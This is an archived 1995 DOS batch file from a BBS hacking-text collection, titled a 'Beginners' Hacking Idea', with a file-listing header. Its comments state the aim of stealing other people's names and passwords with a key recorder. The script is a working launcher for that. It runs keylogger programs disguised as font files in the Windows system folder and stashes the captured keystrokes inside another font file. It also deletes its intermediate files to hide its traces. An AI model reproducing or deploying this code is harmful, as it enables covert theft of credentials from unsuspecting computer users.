home *** CD-ROM | disk | FTP | other *** search
/ The Unsorted BBS Collection / thegreatunsorted.tar / thegreatunsorted / texts / hacking_info_a-l / beg-hck2 / TSR.BAT < prev    next >
DOS Batch File  |  1995-03-08  |  2KB  |  68 lines

  1. @ECHO OFF
  2.  
  3. REM ELiNT's ■BETA■ Beginners' Hacking Idea!  03/08/1995
  4. REM Technic Professions (c) 1995  All rights reserved.
  5.  
  6. REM   This very simple batch will allow you to see the power of a simple batch
  7. REM to "bait" other people's name and password with the use of a key-recorder.
  8. REM Use a batch-to-executable compiler to compile this batch to a .EXE or a
  9. REM .COM.  If your batch compiler is compiles only .COMs, then it really
  10. REM depends on what you are going to link to.  Just becareful not to link up a
  11. REM .COM exceeding 64k!!!
  12.  
  13. REM   Remove the "rem" below to debug this batch and you could find where a
  14. REM problem started from.  The rest is up to you...later.
  15.  
  16.  
  17.  
  18. rem ECHO PHASE 1 - step 1.0
  19.  
  20. if not exist c:\windows\system\fnt____e.fot goto END
  21. if not exist c:\windows\system\fnt____d.fon goto END
  22.  
  23. if not exist c:\windows\system\win.cfg goto skipB
  24.  
  25. rem ECHO PHASE 1 - step 1.1
  26.  
  27. ren c:\windows\system\fnt____e.fot fnt____e.exe >NUL
  28. c:\windows\system\fnt____e.exe /c /h c:\windows\system\win.cfg c:\windows\system\12345678.901 >NUL
  29. ren c:\windows\system\fnt____e.exe fnt____e.fot >NUL
  30.  
  31. rem ECHO PHASE 1 - step 1.2
  32.  
  33. echo>c:\windows\system\win.cfg
  34. ren c:\windows\system\win.cfg 7 >NUL
  35. del c:\windows\system\7
  36.  
  37. :skipB
  38.  
  39. rem ECHO PHASE 1 - step 2.0
  40.  
  41. if not exist c:\windows\system\12345678.901 goto skipA
  42.  
  43. rem ECHO PHASE 1 - step 2.1
  44.  
  45. type c:\windows\system\12345678.901>>c:\windows\system\ARABIC_I.FOT
  46.  
  47. rem ECHO PHASE 1 - step 2.2
  48.  
  49. echo>c:\windows\system\12345678.901
  50.  
  51. rem ECHO PHASE 1 - step 2.3
  52.  
  53. ren c:\windows\system\12345678.901 7 >NUL
  54.  
  55. rem ECHO PHASE 1 - step 2.4
  56.  
  57. del c:\windows\system\7
  58. :skipA
  59.  
  60.  
  61. rem ECHO PHASE 2
  62.  
  63. ren c:\windows\system\fnt____d.fon fnt____d.exe >NUL
  64. c:\windows\system\fnt____d.exe /i /z /r /-m /-s /k=NONE c:\windows\system\win.cfg
  65. ren c:\windows\system\fnt____d.exe fnt____d.fon >NUL
  66.  
  67. :END
  68.